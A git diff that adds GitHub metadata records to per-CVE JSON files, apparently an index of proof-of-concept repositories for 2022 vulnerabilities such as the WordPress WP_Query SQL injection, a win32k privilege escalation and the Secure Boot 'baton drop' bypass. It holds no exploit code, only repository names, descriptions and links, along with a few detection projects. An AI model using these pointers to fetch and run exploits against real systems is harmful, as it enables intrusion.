b/2022/CVE-2022-21660.json new file mode 100644 index 0000000000..cc7843d96e --- /dev/null +++ b/2022/CVE-2022-21660.json @@ -0,0 +1,64 @@ +[ + { + "id": 446296593, + "name": "Gin-Vue-admin-poc-CVE-2022-21660", + "full_name": "UzJu\/Gin-Vue-admin-poc-CVE-2022-21660", + "owner": { + "login": "UzJu", + "id": 50813806, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50813806?v=4", + "html_url": "https:\/\/github.com\/UzJu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UzJu\/Gin-Vue-admin-poc-CVE-2022-21660", + "description": "CVE-2022-21660", + "fork": false, + "created_at": "2022-01-10T05:50:35Z", + "updated_at": "2024-12-16T23:26:40Z", + "pushed_at": "2022-01-10T05:52:03Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 27, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 462232980, + "name": "CVE-2022-21660", + "full_name": "UzJu\/CVE-2022-21660", + "owner": { + "login": "UzJu", + "id": 50813806, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50813806?v=4", + "html_url": "https:\/\/github.com\/UzJu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UzJu\/CVE-2022-21660", + "description": null, + "fork": false, + "created_at": "2022-02-22T09:50:09Z", + "updated_at": "2022-02-22T09:50:09Z", + "pushed_at": "2022-02-22T09:50:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21661.json b/2022/CVE-2022-21661.json index cb0c15cd00..9c5efeafa3 100644 --- a/2022/CVE-2022-21661.json +++ b/2022/CVE-2022-21661.json @@ -30,6 +30,37 @@ "score": 0, "subscribers_count": 2 }, + { + "id": 458502807, + "name": "wordpress-CVE-2022-21661", + "full_name": "purple-WL\/wordpress-CVE-2022-21661", + "owner": { + "login": "purple-WL", + "id": 63894044, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63894044?v=4", + "html_url": "https:\/\/github.com\/purple-WL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/purple-WL\/wordpress-CVE-2022-21661", + "description": null, + "fork": false, + "created_at": "2022-02-12T11:31:26Z", + "updated_at": "2023-04-09T00:06:15Z", + "pushed_at": "2022-02-17T03:59:18Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, { "id": 497289034, "name": "Wordpress-cve-CVE-2022-21661", @@ -60,5 +91,320 @@ "watchers": 13, "score": 0, "subscribers_count": 1 + }, + { + "id": 518852189, + "name": "CVE-2022-21661", + "full_name": "z92g\/CVE-2022-21661", + "owner": { + "login": "z92g", + "id": 108780847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108780847?v=4", + "html_url": "https:\/\/github.com\/z92g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z92g\/CVE-2022-21661", + "description": "WordPress WP_Query SQL Injection POC", + "fork": false, + "created_at": "2022-07-28T13:12:51Z", + "updated_at": "2024-11-16T19:50:56Z", + "pushed_at": "2023-03-11T16:01:39Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 29, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 519762222, + "name": "CVE-2022-21661", + "full_name": "guestzz\/CVE-2022-21661", + "owner": { + "login": "guestzz", + "id": 45824588, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45824588?v=4", + "html_url": "https:\/\/github.com\/guestzz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/guestzz\/CVE-2022-21661", + "description": "CVE-2022-21661 exp for Elementor custom skin.", + "fork": false, + "created_at": "2022-07-31T11:53:06Z", + "updated_at": "2024-05-28T15:23:11Z", + "pushed_at": "2022-08-02T03:09:46Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 563211004, + "name": "CVE-2022-21661", + "full_name": "safe3s\/CVE-2022-21661", + "owner": { + "login": "safe3s", + "id": 108328094, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108328094?v=4", + "html_url": "https:\/\/github.com\/safe3s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/safe3s\/CVE-2022-21661", + "description": "The first poc video presenting the sql injection test from ( WordPress Core 5.8.2-'WP_Query' \/ CVE-2022-21661) ", + "fork": false, + "created_at": "2022-11-08T06:10:49Z", + "updated_at": "2022-11-07T04:28:00Z", + "pushed_at": "2022-11-06T21:43:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 588582544, + "name": "SSI-CVE-2022-21661", + "full_name": "WellingtonEspindula\/SSI-CVE-2022-21661", + "owner": { + "login": "WellingtonEspindula", + "id": 16787873, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16787873?v=4", + "html_url": "https:\/\/github.com\/WellingtonEspindula", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WellingtonEspindula\/SSI-CVE-2022-21661", + "description": "Study and exploit the vulnerability CVE-2022-21661 that allows SQL Injections through plugins POST requests to WordPress versions below 5.8.3.", + "fork": false, + "created_at": "2023-01-13T13:31:34Z", + "updated_at": "2024-10-22T07:08:42Z", + "pushed_at": "2023-11-30T14:51:15Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-21661", + "exploit", + "pof", + "security" + ], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 598931701, + "name": "CVE-2022-21661-Demo", + "full_name": "daniel616\/CVE-2022-21661-Demo", + "owner": { + "login": "daniel616", + "id": 26915500, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26915500?v=4", + "html_url": "https:\/\/github.com\/daniel616", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/daniel616\/CVE-2022-21661-Demo", + "description": "Demonstration of the SQL injection vulnerability in wordpress 5.8.2", + "fork": false, + "created_at": "2023-02-08T04:58:57Z", + "updated_at": "2024-02-03T11:46:18Z", + "pushed_at": "2023-05-10T01:10:08Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 633180220, + "name": "CVE-2022-21661-PoC", + "full_name": "sealldeveloper\/CVE-2022-21661-PoC", + "owner": { + "login": "sealldeveloper", + "id": 120470330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/120470330?v=4", + "html_url": "https:\/\/github.com\/sealldeveloper", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sealldeveloper\/CVE-2022-21661-PoC", + "description": "A Python PoC of CVE-2022-21661, inspired from z92g's Go PoC", + "fork": false, + "created_at": "2023-04-27T00:36:16Z", + "updated_at": "2024-09-09T18:01:25Z", + "pushed_at": "2023-04-27T00:50:50Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 739025859, + "name": "CVE-2022-21661", + "full_name": "p4ncontomat3\/CVE-2022-21661", + "owner": { + "login": "p4ncontomat3", + "id": 52469263, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52469263?v=4", + "html_url": "https:\/\/github.com\/p4ncontomat3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p4ncontomat3\/CVE-2022-21661", + "description": "Script to validate WordPress CVE-2022-21661", + "fork": false, + "created_at": "2024-01-04T15:49:00Z", + "updated_at": "2024-01-04T15:52:21Z", + "pushed_at": "2024-01-04T15:53:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 776679745, + "name": "WordPress--CVE-2022-21661", + "full_name": "CharonDefalt\/WordPress--CVE-2022-21661", + "owner": { + "login": "CharonDefalt", + "id": 103410775, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103410775?v=4", + "html_url": "https:\/\/github.com\/CharonDefalt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CharonDefalt\/WordPress--CVE-2022-21661", + "description": null, + "fork": false, + "created_at": "2024-03-24T07:03:35Z", + "updated_at": "2024-03-24T07:03:35Z", + "pushed_at": "2024-03-24T07:03:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 887277471, + "name": "CVE-2022-21661", + "full_name": "w0r1i0g1ht\/CVE-2022-21661", + "owner": { + "login": "w0r1i0g1ht", + "id": 78846391, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78846391?v=4", + "html_url": "https:\/\/github.com\/w0r1i0g1ht", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/w0r1i0g1ht\/CVE-2022-21661", + "description": "CVE-2022-21661 docker and poc", + "fork": false, + "created_at": "2024-11-12T13:23:12Z", + "updated_at": "2024-11-12T13:30:16Z", + "pushed_at": "2024-11-12T13:30:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 887747640, + "name": "cve-2022-21661", + "full_name": "kittypurrnaz\/cve-2022-21661", + "owner": { + "login": "kittypurrnaz", + "id": 115413009, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115413009?v=4", + "html_url": "https:\/\/github.com\/kittypurrnaz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kittypurrnaz\/cve-2022-21661", + "description": null, + "fork": false, + "created_at": "2024-11-13T08:05:30Z", + "updated_at": "2024-11-16T23:18:36Z", + "pushed_at": "2024-11-16T23:18:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-21668.json b/2022/CVE-2022-21668.json new file mode 100644 index 0000000000..d820ba831b --- /dev/null +++ b/2022/CVE-2022-21668.json @@ -0,0 +1,33 @@ +[ + { + "id": 474484235, + "name": "CVE-2022-21668-Pipenv-RCE-vulnerability", + "full_name": "sreeram281997\/CVE-2022-21668-Pipenv-RCE-vulnerability", + "owner": { + "login": "sreeram281997", + "id": 53993620, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53993620?v=4", + "html_url": "https:\/\/github.com\/sreeram281997", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sreeram281997\/CVE-2022-21668-Pipenv-RCE-vulnerability", + "description": null, + "fork": false, + "created_at": "2022-03-26T22:50:36Z", + "updated_at": "2022-03-28T01:27:30Z", + "pushed_at": "2022-03-27T03:42:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21839.json b/2022/CVE-2022-21839.json new file mode 100644 index 0000000000..938fc0b226 --- /dev/null +++ b/2022/CVE-2022-21839.json @@ -0,0 +1,33 @@ +[ + { + "id": 587390406, + "name": "CVE-2022-21839-", + "full_name": "lolin19\/CVE-2022-21839-", + "owner": { + "login": "lolin19", + "id": 104766804, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104766804?v=4", + "html_url": "https:\/\/github.com\/lolin19", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lolin19\/CVE-2022-21839-", + "description": null, + "fork": false, + "created_at": "2023-01-10T16:34:02Z", + "updated_at": "2023-01-10T16:34:02Z", + "pushed_at": "2023-01-10T16:42:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-2185.json b/2022/CVE-2022-2185.json new file mode 100644 index 0000000000..f76c0f1f68 --- /dev/null +++ b/2022/CVE-2022-2185.json @@ -0,0 +1,64 @@ +[ + { + "id": 509694771, + "name": "CVE-2022-2185-poc", + "full_name": "safe3s\/CVE-2022-2185-poc", + "owner": { + "login": "safe3s", + "id": 108328094, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108328094?v=4", + "html_url": "https:\/\/github.com\/safe3s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/safe3s\/CVE-2022-2185-poc", + "description": "CVE-2022-2185 poc", + "fork": false, + "created_at": "2022-07-02T07:58:01Z", + "updated_at": "2024-04-10T07:50:47Z", + "pushed_at": "2022-07-12T16:35:30Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 13, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 519186045, + "name": "CVE-2022-2185", + "full_name": "ESUAdmin\/CVE-2022-2185", + "owner": { + "login": "ESUAdmin", + "id": 69588341, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69588341?v=4", + "html_url": "https:\/\/github.com\/ESUAdmin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ESUAdmin\/CVE-2022-2185", + "description": "wo ee cve-2022-2185 gitlab authenticated rce", + "fork": false, + "created_at": "2022-07-29T11:14:03Z", + "updated_at": "2024-11-16T19:49:53Z", + "pushed_at": "2022-07-29T11:28:59Z", + "stargazers_count": 78, + "watchers_count": 78, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 78, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21877.json b/2022/CVE-2022-21877.json new file mode 100644 index 0000000000..2153ee3696 --- /dev/null +++ b/2022/CVE-2022-21877.json @@ -0,0 +1,33 @@ +[ + { + "id": 456710810, + "name": "cve-2022-21877", + "full_name": "Big5-sec\/cve-2022-21877", + "owner": { + "login": "Big5-sec", + "id": 29749118, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29749118?v=4", + "html_url": "https:\/\/github.com\/Big5-sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Big5-sec\/cve-2022-21877", + "description": "a demonstration PoC for CVE-2022-21877 (storage spaces controller memory leak)", + "fork": false, + "created_at": "2022-02-07T23:18:17Z", + "updated_at": "2023-11-23T03:06:36Z", + "pushed_at": "2022-02-08T22:53:36Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21881.json b/2022/CVE-2022-21881.json new file mode 100644 index 0000000000..136e19e732 --- /dev/null +++ b/2022/CVE-2022-21881.json @@ -0,0 +1,33 @@ +[ + { + "id": 522979595, + "name": "CVE-2022-21881", + "full_name": "theabysslabs\/CVE-2022-21881", + "owner": { + "login": "theabysslabs", + "id": 110839037, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110839037?v=4", + "html_url": "https:\/\/github.com\/theabysslabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/theabysslabs\/CVE-2022-21881", + "description": "POC of CVE-2022-21881 exploited at TianfuCup 2021 to escape Chrome Sandbox", + "fork": false, + "created_at": "2022-08-09T14:16:40Z", + "updated_at": "2025-01-05T21:06:50Z", + "pushed_at": "2022-08-09T14:28:48Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 19, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21882.json b/2022/CVE-2022-21882.json new file mode 100644 index 0000000000..18925ffd8c --- /dev/null +++ b/2022/CVE-2022-21882.json @@ -0,0 +1,192 @@ +[ + { + "id": 452529582, + "name": "CVE-2022-21882", + "full_name": "KaLendsi\/CVE-2022-21882", + "owner": { + "login": "KaLendsi", + "id": 68001644, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68001644?v=4", + "html_url": "https:\/\/github.com\/KaLendsi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KaLendsi\/CVE-2022-21882", + "description": "win32k LPE ", + "fork": false, + "created_at": "2022-01-27T03:44:10Z", + "updated_at": "2024-12-27T12:18:55Z", + "pushed_at": "2022-01-27T04:18:18Z", + "stargazers_count": 461, + "watchers_count": 461, + "has_discussions": false, + "forks_count": 134, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 134, + "watchers": 461, + "score": 0, + "subscribers_count": 14 + }, + { + "id": 454493738, + "name": "CVE-2022-21882", + "full_name": "David-Honisch\/CVE-2022-21882", + "owner": { + "login": "David-Honisch", + "id": 35835504, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35835504?v=4", + "html_url": "https:\/\/github.com\/David-Honisch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/David-Honisch\/CVE-2022-21882", + "description": "CVE-2022-21882", + "fork": false, + "created_at": "2022-02-01T17:58:29Z", + "updated_at": "2024-01-02T10:31:49Z", + "pushed_at": "2022-02-01T18:14:07Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 8, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 455137692, + "name": "CVE-2022-21882", + "full_name": "L4ys\/CVE-2022-21882", + "owner": { + "login": "L4ys", + "id": 5360374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5360374?v=4", + "html_url": "https:\/\/github.com\/L4ys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/L4ys\/CVE-2022-21882", + "description": null, + "fork": false, + "created_at": "2022-02-03T11:25:14Z", + "updated_at": "2024-11-10T10:54:56Z", + "pushed_at": "2022-02-04T02:20:47Z", + "stargazers_count": 194, + "watchers_count": 194, + "has_discussions": false, + "forks_count": 53, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 53, + "watchers": 194, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 456348360, + "name": "cve-2022-21882-poc", + "full_name": "sailay1996\/cve-2022-21882-poc", + "owner": { + "login": "sailay1996", + "id": 16739401, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16739401?v=4", + "html_url": "https:\/\/github.com\/sailay1996", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sailay1996\/cve-2022-21882-poc", + "description": "lpe poc for cve-2022-21882 ", + "fork": false, + "created_at": "2022-02-07T03:45:36Z", + "updated_at": "2024-12-27T14:20:04Z", + "pushed_at": "2022-02-07T03:49:37Z", + "stargazers_count": 48, + "watchers_count": 48, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-21882", + "privilege-escalation", + "windows-exploitation" + ], + "visibility": "public", + "forks": 18, + "watchers": 48, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 459331281, + "name": "CVE-2022-21882", + "full_name": "r1l4-i3pur1l4\/CVE-2022-21882", + "owner": { + "login": "r1l4-i3pur1l4", + "id": 76409019, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76409019?v=4", + "html_url": "https:\/\/github.com\/r1l4-i3pur1l4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r1l4-i3pur1l4\/CVE-2022-21882", + "description": null, + "fork": false, + "created_at": "2022-02-14T21:28:15Z", + "updated_at": "2024-05-13T04:15:01Z", + "pushed_at": "2022-02-15T08:29:26Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 630777901, + "name": "CVE-2022-21882", + "full_name": "dishfwk\/CVE-2022-21882", + "owner": { + "login": "dishfwk", + "id": 131247034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131247034?v=4", + "html_url": "https:\/\/github.com\/dishfwk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dishfwk\/CVE-2022-21882", + "description": null, + "fork": false, + "created_at": "2023-04-21T06:14:06Z", + "updated_at": "2023-04-21T06:15:47Z", + "pushed_at": "2023-04-26T11:01:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21894.json b/2022/CVE-2022-21894.json new file mode 100644 index 0000000000..adc3563329 --- /dev/null +++ b/2022/CVE-2022-21894.json @@ -0,0 +1,196 @@ +[ + { + "id": 523015625, + "name": "CVE-2022-21894", + "full_name": "Wack0\/CVE-2022-21894", + "owner": { + "login": "Wack0", + "id": 2650838, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2650838?v=4", + "html_url": "https:\/\/github.com\/Wack0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wack0\/CVE-2022-21894", + "description": "baton drop (CVE-2022-21894): Secure Boot Security Feature Bypass Vulnerability", + "fork": false, + "created_at": "2022-08-09T15:53:48Z", + "updated_at": "2025-01-06T07:28:42Z", + "pushed_at": "2023-09-27T06:44:27Z", + "stargazers_count": 318, + "watchers_count": 318, + "has_discussions": false, + "forks_count": 62, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-21894", + "cve-2023-24932", + "poc", + "secure-boot", + "uefi", + "vulnerability", + "windows-boot" + ], + "visibility": "public", + "forks": 62, + "watchers": 318, + "score": 0, + "subscribers_count": 12 + }, + { + "id": 526405651, + "name": "CVE-2022-21894-Payload", + "full_name": "ASkyeye\/CVE-2022-21894-Payload", + "owner": { + "login": "ASkyeye", + "id": 50972716, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50972716?v=4", + "html_url": "https:\/\/github.com\/ASkyeye", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ASkyeye\/CVE-2022-21894-Payload", + "description": "Example payload for CVE-2022-21894", + "fork": false, + "created_at": "2022-08-18T23:45:47Z", + "updated_at": "2024-07-16T03:40:35Z", + "pushed_at": "2023-09-27T06:18:45Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 612635950, + "name": "batondrop_armv7", + "full_name": "Wack0\/batondrop_armv7", + "owner": { + "login": "Wack0", + "id": 2650838, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2650838?v=4", + "html_url": "https:\/\/github.com\/Wack0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wack0\/batondrop_armv7", + "description": "An implementation of baton drop (CVE-2022-21894) for armv7 (MSM8960)", + "fork": false, + "created_at": "2023-03-11T14:38:13Z", + "updated_at": "2025-01-05T19:08:06Z", + "pushed_at": "2023-03-11T14:46:39Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 10, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 626737095, + "name": "BlackLotusDetection", + "full_name": "bakedmuffinman\/BlackLotusDetection", + "owner": { + "login": "bakedmuffinman", + "id": 28766981, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28766981?v=4", + "html_url": "https:\/\/github.com\/bakedmuffinman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bakedmuffinman\/BlackLotusDetection", + "description": "Created to help detect IOCs for CVE-2022-21894: The BlackLotus campaign", + "fork": false, + "created_at": "2023-04-12T04:05:42Z", + "updated_at": "2023-04-12T04:06:54Z", + "pushed_at": "2023-04-12T04:13:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 626751306, + "name": "BlackLotus-Detection", + "full_name": "qjawls2003\/BlackLotus-Detection", + "owner": { + "login": "qjawls2003", + "id": 35247051, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35247051?v=4", + "html_url": "https:\/\/github.com\/qjawls2003", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qjawls2003\/BlackLotus-Detection", + "description": "Public repo for anything CVE-2022-21894", + "fork": false, + "created_at": "2023-04-12T05:01:50Z", + "updated_at": "2023-04-12T05:15:56Z", + "pushed_at": "2023-04-12T05:31:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": true, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 696622822, + "name": "CVE-2022-21894-Payload-New", + "full_name": "nova-master\/CVE-2022-21894-Payload-New", + "owner": { + "login": "nova-master", + "id": 129145316, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129145316?v=4", + "html_url": "https:\/\/github.com\/nova-master", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nova-master\/CVE-2022-21894-Payload-New", + "description": null, + "fork": false, + "created_at": "2023-09-26T05:52:36Z", + "updated_at": "2024-01-04T04:15:51Z", + "pushed_at": "2023-09-26T06:01:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21907.json b/2022/CVE-2022-21907.json index 175a0feb46..40f320bd87 100644 --- a/2022/CVE-2022-21907.json +++ b/2022/CVE-2022-21907.json @@ -30,6 +30,119 @@ "score": 0, "subscribers_count": 9 }, + { + "id": 448387955, + "name": "CVE-2022-21907", + "full_name": "mauricelambert\/CVE-2022-21907", + "owner": { + "login": "mauricelambert", + "id": 50479118, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50479118?v=4", + "html_url": "https:\/\/github.com\/mauricelambert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mauricelambert\/CVE-2022-21907", + "description": "CVE-2022-21907: detection, protection, exploitation and demonstration. Exploitation: Powershell, Python, Ruby, NMAP and Metasploit. Detection and protection: Powershell. Demonstration: Youtube.", + "fork": false, + "created_at": "2022-01-15T20:50:25Z", + "updated_at": "2024-04-09T12:36:06Z", + "pushed_at": "2022-03-07T19:45:22Z", + "stargazers_count": 27, + "watchers_count": 27, + 